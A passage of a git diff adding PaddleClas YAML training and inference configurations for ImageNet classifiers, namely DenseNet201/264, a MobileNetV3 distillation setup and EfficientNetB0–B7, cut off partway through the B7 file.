resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DenseNet/DenseNet201.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DenseNet/DenseNet201.yaml new file mode 100644 index 0000000..df2545c --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DenseNet/DenseNet201.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DenseNet201 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + 
Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DenseNet/DenseNet264.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DenseNet/DenseNet264.yaml new file mode 100644 index 0000000..bee9a26 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DenseNet/DenseNet264.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DenseNet264 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: 
[30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Distillation/mv3_large_x1_0_distill_mv3_small_x1_0.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Distillation/mv3_large_x1_0_distill_mv3_small_x1_0.yaml new file mode 100644 index 0000000..3a96e58 --- /dev/null +++ 
b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Distillation/mv3_large_x1_0_distill_mv3_small_x1_0.yaml @@ -0,0 +1,153 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: "./output/" + device: "gpu" + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: "./inference" + +# model architecture +Arch: + name: "DistillationModel" + class_num: 1000 + # if not null, its lengths should be same as models + pretrained_list: + # if not null, its lengths should be same as models + freeze_params_list: + - True + - False + models: + - Teacher: + name: MobileNetV3_large_x1_0 + pretrained: True + use_ssld: True + - Student: + name: MobileNetV3_small_x1_0 + pretrained: False + + infer_model_name: "Student" + + +# loss function config for traing/eval process +Loss: + Train: + - DistillationCELoss: + weight: 1.0 + model_name_pairs: + - ["Student", "Teacher"] + Eval: + - DistillationGTCELoss: + weight: 1.0 + model_names: ["Student"] + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 1.3 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: "./dataset/ILSVRC2012/" + cls_label_path: "./dataset/ILSVRC2012/train_list.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 6 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: "./dataset/ILSVRC2012/" + cls_label_path: 
"./dataset/ILSVRC2012/val_list.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 6 + use_shared_memory: True + +Infer: + infer_imgs: "docs/images/whl/demo.jpg" + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: DistillationPostProcess + func: Topk + topk: 5 + class_id_map_file: "ppcls/utils/imagenet1k_label_list.txt" + +Metric: + Train: + - DistillationTopkAcc: + model_key: "Student" + topk: [1, 5] + Eval: + - DistillationTopkAcc: + model_key: "Student" + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB0.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB0.yaml new file mode 100644 index 0000000..2748e2f --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB0.yaml @@ -0,0 +1,133 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: EfficientNetB0 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: RMSProp + momentum: 0.9 + rho: 0.9 
+ epsilon: 0.001 + lr: + name: Cosine + learning_rate: 0.032 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB1.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB1.yaml new file mode 100644 index 0000000..502be5e --- /dev/null 
+++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB1.yaml @@ -0,0 +1,133 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: EfficientNetB1 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: RMSProp + momentum: 0.9 + rho: 0.9 + epsilon: 0.001 + lr: + name: Cosine + learning_rate: 0.032 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 240 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 272 + - CropImage: + size: 240 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: 
docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB2.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB2.yaml new file mode 100644 index 0000000..230d560 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB2.yaml @@ -0,0 +1,133 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: EfficientNetB2 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: RMSProp + momentum: 0.9 + rho: 0.9 + epsilon: 0.001 + lr: + name: Cosine + learning_rate: 0.032 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 260 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] 
+ order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 292 + - CropImage: + size: 260 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB3.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB3.yaml new file mode 100644 index 0000000..fcd8c01 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB3.yaml @@ -0,0 +1,133 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: EfficientNetB3 + class_num: 1000 + +# loss function config for traing/eval 
process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: RMSProp + momentum: 0.9 + rho: 0.9 + epsilon: 0.001 + lr: + name: Cosine + learning_rate: 0.032 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 300 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 332 + - CropImage: + size: 300 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git 
a/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB4.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB4.yaml new file mode 100644 index 0000000..1f97c71 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB4.yaml @@ -0,0 +1,133 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: EfficientNetB4 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: RMSProp + momentum: 0.9 + rho: 0.9 + epsilon: 0.001 + lr: + name: Cosine + learning_rate: 0.032 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 380 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 412 + - CropImage: + size: 380 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 
0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB5.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB5.yaml new file mode 100644 index 0000000..94656dc --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB5.yaml @@ -0,0 +1,133 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: EfficientNetB5 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: RMSProp + momentum: 0.9 + rho: 0.9 + epsilon: 0.001 + lr: + name: Cosine + learning_rate: 0.032 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - 
DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 456 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 488 + - CropImage: + size: 456 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB6.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB6.yaml new file mode 100644 index 0000000..8da4f00 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB6.yaml @@ -0,0 +1,133 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + 
use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: EfficientNetB6 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: RMSProp + momentum: 0.9 + rho: 0.9 + epsilon: 0.001 + lr: + name: Cosine + learning_rate: 0.032 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 528 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 560 + - CropImage: + size: 528 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: 
Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB7.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB7.yaml new file mode 100644 index 0000000..2470cff --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB7.yaml @@ -0,0 +1,133 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: EfficientNetB7 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: RMSProp + momentum: 0.9 + rho: 0.9 + epsilon: 0.001 + lr: + name: Cosine + learning_rate: 0.032 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 600 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + 